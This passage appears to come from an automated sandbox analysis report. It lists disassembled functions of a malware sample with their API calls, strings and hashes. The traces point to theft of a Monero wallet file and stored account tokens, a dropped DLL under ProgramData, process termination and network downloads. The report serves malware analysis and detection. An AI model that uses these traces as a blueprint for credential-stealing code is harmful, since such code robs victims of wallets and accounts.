                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 85b40c2a0aed6c97a7c845feaf54df505ca44f4d46a8e18aaf7bddeeca31db88
                                      • Instruction ID: c4a4e56d7d4b03d2c02aa485edbd4ec10ac061e9fa7965ba268e2d98595f1714
                                      • Opcode Fuzzy Hash: 85b40c2a0aed6c97a7c845feaf54df505ca44f4d46a8e18aaf7bddeeca31db88
                                      • Instruction Fuzzy Hash: 3E5174B1A00218ABEF24DF90DC45BEE77B9AB44705F108098F605BB1C0DB74AAC5DF95
                                      Function 00F9012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 00F9024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 00F9035B
                                      • CatchIt.LIBVCRUNTIME ref: 00F903AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 00F904C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: 4ab53445ba5d02f5946e853689438caf8e4e050253633164950c3ae102e2f85a
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: 23B16D71C00209EFEF15EFA8C8859AEBBB5FF04320F14416AE9156B212DB35DA51EF91
                                      Function 00F1BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      • lstrlen.KERNEL32(00000000), ref: 00F1BC6F
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00F1BC9D
                                      • lstrlen.KERNEL32(00000000), ref: 00F1BD75
                                      • lstrlen.KERNEL32(00000000), ref: 00F1BD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: db492039f322519f1747c015bbddbb21242b64fb0e922c84e6dfc8a594f9563a
                                      • Instruction ID: 5ba36c7c3bc6beaa62ebe1b4db276ecf768ca342e34fa37c7e19f502d12c9bc4
                                      • Opcode Fuzzy Hash: db492039f322519f1747c015bbddbb21242b64fb0e922c84e6dfc8a594f9563a
                                      • Instruction Fuzzy Hash: 31B142729101189BCB18FBE0EDA6EEE7379BF54304F404568F50677191EF38AA48DB62
                                      Function 00F26A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: 3d9049ee7185bfbe79cc4c163ea3afde6abda4df2754df7437d5d9423be5cae2
                                      • Instruction ID: a725c33bc924e004a001b4b3272728ed5712627ecbf21612159f069ebcd254ff
                                      • Opcode Fuzzy Hash: 3d9049ee7185bfbe79cc4c163ea3afde6abda4df2754df7437d5d9423be5cae2
                                      • Instruction Fuzzy Hash: DBF05E30948309EFE36C9FE0E40976CBBB1EF04707F1141A5F6299A1C4C6748AC09FA1
                                      Function 00F208A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F29850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00F208DC,C:\ProgramData\chrome.dll), ref: 00F29871
                                        • Part of subcall function 00F1A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F1A098
                                      • StrCmpCA.SHLWAPI(00000000,01D88F58), ref: 00F20922
                                      • StrCmpCA.SHLWAPI(00000000,01D89038), ref: 00F20B79
                                      • StrCmpCA.SHLWAPI(00000000,01D88F38), ref: 00F20A0C
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F20C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 00F20C30
                                      • C:\ProgramData\chrome.dll, xrefs: 00F208CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 585553867-663540502
                                      • Opcode ID: c4dc864b1527832e556e274b88429a3fa33af83b17bcc90d903110eac0a74815
                                      • Instruction ID: a7782b1a890f85dd2b14f1b56c3394f1595a0abf7a98e138128d7282faebce2d
                                      • Opcode Fuzzy Hash: c4dc864b1527832e556e274b88429a3fa33af83b17bcc90d903110eac0a74815
                                      • Instruction Fuzzy Hash: CDA14571B001089FCB28EF64DD96AED77B6BF94300F50856DE80A5F252DB34DA05DB92
                                      Function 00F8F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00F8FA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F8FA27
                                      • _ValidateLocalCookies.LIBCMT ref: 00F8FAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F8FADB
                                      • _ValidateLocalCookies.LIBCMT ref: 00F8FB30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: 11950466c67bb44d07fd4f4918f7618b3d80d458b0c7ac8746a3fcc5e1751f04
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: 2E41C331E00209EFCF14EF68CC81ADE7BB5BF49324F148165E818AB391D7359909DB91
                                      Function 00F15000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F1501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F15021
                                      • InternetOpenA.WININET(00F30DE3,00000000,00000000,00000000,00000000), ref: 00F1503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F15061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00F15091
                                      • InternetCloseHandle.WININET(?), ref: 00F15109
                                      • InternetCloseHandle.WININET(?), ref: 00F15116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: eb8e597565d37d768d42593efa48a5a92538480b2b445240496920fbb62dd221
                                      • Instruction ID: 0eaa49d8658b1b2d4aaa8804262b7bcde9c457f1377ce6a0cb2029cea36954af
                                      • Opcode Fuzzy Hash: eb8e597565d37d768d42593efa48a5a92538480b2b445240496920fbb62dd221
                                      • Instruction Fuzzy Hash: 64311AB4A00218EBDB24CF94DC85BDCB7B5AB48704F1081E9FB09A7280C7706EC59F98
                                      Function 00F2856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F285B6
                                      • wsprintfA.USER32 ref: 00F285E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F2860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F2861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F28629
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,01D8E140,00000000,000F003F,?,00000400), ref: 00F2867C
                                      • lstrlen.KERNEL32(?), ref: 00F28691
                                      • RegQueryValueExA.ADVAPI32(00000000,01D8E0B0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F30B3C), ref: 00F28729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F28798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F287AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: aa195169eaae5e8edf0cf4e58dcee0414371efb65bd49b21023a77c26b734584
                                      • Instruction ID: b467c305ac7a2ee54ca4b8917a2d806b5ff90c447a79a264278e450d753d8e92
                                      • Opcode Fuzzy Hash: aa195169eaae5e8edf0cf4e58dcee0414371efb65bd49b21023a77c26b734584
                                      • Instruction Fuzzy Hash: A3212F7191122CABDB24DB94DC85FE9B3B8FB48700F0081E8E609A6180DF74AAC5CFD4
                                      Function 00F299A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F299C5
                                      • Process32First.KERNEL32(00F1A056,00000128), ref: 00F299D9
                                      • Process32Next.KERNEL32(00F1A056,00000128), ref: 00F299F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F29A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F29A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00F29A79
                                      • CloseHandle.KERNEL32(00F1A056), ref: 00F29A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 12d446acf501497f02101abf47be200e9f713d61aca087ae78ff34298cdf2791
                                      • Instruction ID: 21a4f336fa131ab478ed22742500c520d5f6af211269a1d739da6af12455255b
                                      • Opcode Fuzzy Hash: 12d446acf501497f02101abf47be200e9f713d61aca087ae78ff34298cdf2791
                                      • Instruction Fuzzy Hash: 2C21ED75904318ABDB35DF95E888BDDB7B5BB48300F1041D8E509AB284D7789EC4DF90
                                      Function 00F27820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F2783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,01D7C400,00000000,00020119,00000000), ref: 00F2786D
                                      • RegQueryValueExA.ADVAPI32(00000000,01D8E110,00000000,00000000,?,000000FF), ref: 00F2788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F27898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
